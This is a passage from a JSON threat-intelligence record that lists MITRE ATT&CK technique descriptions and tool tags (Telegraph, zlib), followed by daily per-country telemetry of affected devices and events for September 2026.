Microsoft Virutal Machine API)\n\n[System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques) ", "created_on": "2020-02-26T13:49:10.000Z", "name": "System Information Discovery"}, {"id": "7ce1cfeb-964d-11ea-8942-06365ef617e6", "category": "sector", "description": "", "created_on": "2020-05-15T01:43:34.000Z", "name": "Technology"}, {"id": "1b35fcb0-6599-43cd-be51-68c4e670f620", "category": "trellix-tool", "description": "Telegra.ph, often referred to as Telegraph, is a minimalist and anonymous publishing platform developed by the creators of the popular messaging service Telegram.", "created_on": "2026-06-04T00:15:37.000Z", "name": "Telegraph"}, {"id": "7b0e82d8-af5e-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nManipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", "created_on": "2021-05-07T18:03:09.000Z", "name": "Transmitted Data Manipulation"}, {"id": "c36e385c-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.\n\nIn some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account.(Citation: CISA MFA PrintNightmare)\n\nThe overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.(Citation: TechNet Credential Theft)", "created_on": "2020-02-26T13:49:09.000Z", "name": "Valid Accounts"}, {"id": "9ce70935-2adc-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as HTTP/S(Citation: CrowdStrike Putter Panda) and WebSocket(Citation: Brazking-Websockets) that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ", "created_on": "2020-11-20T03:00:57.000Z", "name": "Web Protocols"}, {"id": "12bbcf25-d8e6-4729-becc-509ee23be8bd", "category": "trellix-tool", "description": "Zlib is a software library used for data compression and utilizes lossless compression. This is portable across various platforms such as Linux, Windows and Macintosh.\r\n\r\nSource: Zlib.net", "created_on": "2023-03-21T21:11:05.000Z", "name": "Zlib Compression Library"}], "metrics": [{"date": "2026-09-10", "nodes": 3.9, "events": 8.9, "sectors": [{"sector": "Unknown", "affected": 32.83, "events": 74.85, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 3.48, "events": 17.39, "total": 1000000}, {"iso_code": "KR", "affected": 241.95, "events": 302.44, "total": 1000000}, {"iso_code": "IN", "affected": 25, "events": 25, "total": 1000000}, {"iso_code": "IT", "affected": 10.08, "events": 13.44, "total": 1000000}, {"iso_code": "TR", "affected": 14.4, "events": 43.21, "total": 1000000}, {"iso_code": "TW", "affected": 41.61, "events": 62.41, "total": 1000000}, {"iso_code": "BR", "affected": 2.8, "events": 2.8, "total": 1000000}, {"iso_code": "CA", "affected": 3.76, "events": 11.29, "total": 1000000}, {"iso_code": "DE", "affected": 1.04, "events": 1.04, "total": 1000000}, {"iso_code": "FR", "affected": 1.62, "events": 1.62, "total": 1000000}, {"iso_code": "KZ", "affected": 96.04, "events": 96.04, "total": 1000000}, {"iso_code": "MY", "affected": 15.44, "events": 30.88, "total": 1000000}, {"iso_code": "PK", "affected": 44.68, "events": 44.68, "total": 1000000}, {"iso_code": "TH", "affected": 16.2, "events": 16.2, "total": 1000000}, {"iso_code": "GB", "affected": 2.88, "events": 2.88, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-11", "nodes": 2.34, "events": 3.83, "sectors": [{"sector": "Unknown", "affected": 19.7, "events": 32.17, "total": 1000000}], "countries": [{"iso_code": "IT", "affected": 10.08, "events": 10.08, "total": 1000000}, {"iso_code": "US", "affected": 1.07, "events": 4.28, "total": 1000000}, {"iso_code": "CZ", "affected": 26.91, "events": 26.91, "total": 1000000}, {"iso_code": "DE", "affected": 1.04, "events": 1.56, "total": 1000000}, {"iso_code": "TR", "affected": 9.6, "events": 14.4, "total": 1000000}, {"iso_code": "AU", "affected": 15.85, "events": 15.85, "total": 1000000}, {"iso_code": "ES", "affected": 5.44, "events": 5.44, "total": 1000000}, {"iso_code": "FR", "affected": 1.62, "events": 3.24, "total": 1000000}, {"iso_code": "IE", "affected": 37.98, "events": 37.98, "total": 1000000}, {"iso_code": "IN", "affected": 8.33, "events": 8.33, "total": 1000000}, {"iso_code": "KR", "affected": 60.49, "events": 60.49, "total": 1000000}, {"iso_code": "NO", "affected": 184.57, "events": 369.14, "total": 1000000}, {"iso_code": "PH", "affected": 25.85, "events": 25.85, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-12", "nodes": 1.41, "events": 3.44, "sectors": [{"sector": "Unknown", "affected": 11.82, "events": 28.89, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 1.07, "events": 4.28, "total": 1000000}, {"iso_code": "SG", "affected": 19.33, "events": 58, "total": 1000000}, {"iso_code": "DE", "affected": 1.04, "events": 1.56, "total": 1000000}, {"iso_code": "IT", "affected": 10.08, "events": 16.8, "total": 1000000}, {"iso_code": "DO", "affected": 34.71, "events": 34.71, "total": 1000000}, {"iso_code": "IN", "affected": 1.67, "events": 1.67, "total": 1000000}, {"iso_code": "KR", "affected": 60.49, "events": 60.49, "total": 1000000}, {"iso_code": "PL", "affected": 9.05, "events": 9.05, "total": 1000000}, {"iso_code": "TR", "affected": 4.8, "events": 28.81, "total": 1000000}, {"iso_code": "VN", "affected": 3.65, "events": 3.65, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-13", "nodes": 0.94, "events": 2.34, "sectors": [{"sector": "Unknown", "affected": 7.88, "events": 19.7, "total": 1000000}], "countries": [{"iso_code": "SG", "affected": 25.78, "events": 45.11, "total": 1000000}, {"iso_code": "US", "affected": 1.07, "events": 4.55, "total": 1000000}, {"iso_code": "IN", "affected": 1.67, "events": 3.33, "total": 1000000}, {"iso_code": "JP", "affected": 1.62, "events": 1.62, "total": 1000000}, {"iso_code": "MY", "affected": 15.44, "events": 30.88, "total": 1000000}, {"iso_code": "TR", "affected": 4.8, "events": 4.8, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-14", "nodes": 3.28, "events": 5.62, "sectors": [{"sector": "Unknown", "affected": 27.58, "events": 47.28, "total": 1000000}], "countries": [{"iso_code": "IT", "affected": 20.16, "events": 23.52, "total": 1000000}, {"iso_code": "SG", "affected": 25.78, "events": 70.89, "total": 1000000}, {"iso_code": "US", "affected": 1.6, "events": 5.35, "total": 1000000}, {"iso_code": "BR", "affected": 11.2, "events": 25.2, "total": 1000000}, {"iso_code": "CH", "affected": 30.4, "events": 30.4, "total": 1000000}, {"iso_code": "JP", "affected": 11.35, "events": 11.35, "total": 1000000}, {"iso_code": "KR", "affected": 120.98, "events": 181.47, "total": 1000000}, {"iso_code": "TW", "affected": 41.61, "events": 41.61, "total": 1000000}, {"iso_code": "AT", "affected": 10.94, "events": 10.94, "total": 1000000}, {"iso_code": "AU", "affected": 15.85, "events": 15.85, "total": 1000000}, {"iso_code": "CZ", "affected": 13.46, "events": 13.46, "total": 1000000}, {"iso_code": "DE", "affected": 1.04, "events": 1.04, "total": 1000000}, {"iso_code": "FR", "affected": 1.62, "events": 1.62, "total": 1000000}, {"iso_code": "MY", "affected": 15.44, "events": 30.88, "total": 1000000}, {"iso_code": "VN", "affected": 3.65, "events": 7.3, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-15", "nodes": 2.42, "events": 4.29, "sectors": [{"sector": "Unknown", "affected": 20.36, "events": 36.11, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 2.41, "events": 5.62, "total": 1000000}, {"iso_code": "IT", "affected": 6.72, "events": 10.08, "total": 1000000}, {"iso_code": "JP", "affected": 3.24, "events": 3.24, "total": 1000000}, {"iso_code": "KR", "affected": 241.95, "events": 241.95, "total": 1000000}, {"iso_code": "SG", "affected": 12.89, "events": 25.78, "total": 1000000}, {"iso_code": "TR", "affected": 14.4, "events": 38.41, "total": 1000000}, {"iso_code": "AU", "affected": 31.69, "events": 31.69, "total": 1000000}, {"iso_code": "DE", "affected": 0.52, "events": 0.52, "total": 1000000}, {"iso_code": "NO", "affected": 184.57, "events": 184.57, "total": 1000000}, {"iso_code": "PH", "affected": 25.85, "events": 25.85, "total": 1000000}, {"iso_code": "PK", "affected": 44.68, "events": 44.68, "total": 1000000}, {"iso_code": "TH", "affected": 16.2, "events": 64.79, "total": 1000000}, {"iso_code": "TW", "affected": 20.8, "events": 41.61, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-16", "nodes": 1.33, "events": 2.42, "sectors": [{"sector": "Unknown", "affected": 11.16, "events": 20.36, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 0.8, "events": 4.01, "total": 1000000}, {"iso_code": "KR", "affected": 302.44, "events": 362.93, "total": 1000000}, {"iso_code": "CH", "affected": 10.13, "events": 10.13, "total": 1000000}, {"iso_code": "DE", "affected": 1.04, "events": 1.04, "total": 1000000}, {"iso_code": "FR", "affected": 1.62, "events": 1.62, "total": 1000000}, {"iso_code": "IT", "affected": 3.36, "events": 3.36, "total": 1000000}, {"iso_code": "JP", "affected": 3.24, "events": 3.24, "total": 1000000}, {"iso_code": "PK", "affected": 44.68, "events": 89.36, "total": 1000000}, {"iso_code": "TR", "affected": 4.8, "events": 4.8, "total": 1000000}], "countriesTotalDevices": 1000000}]}]}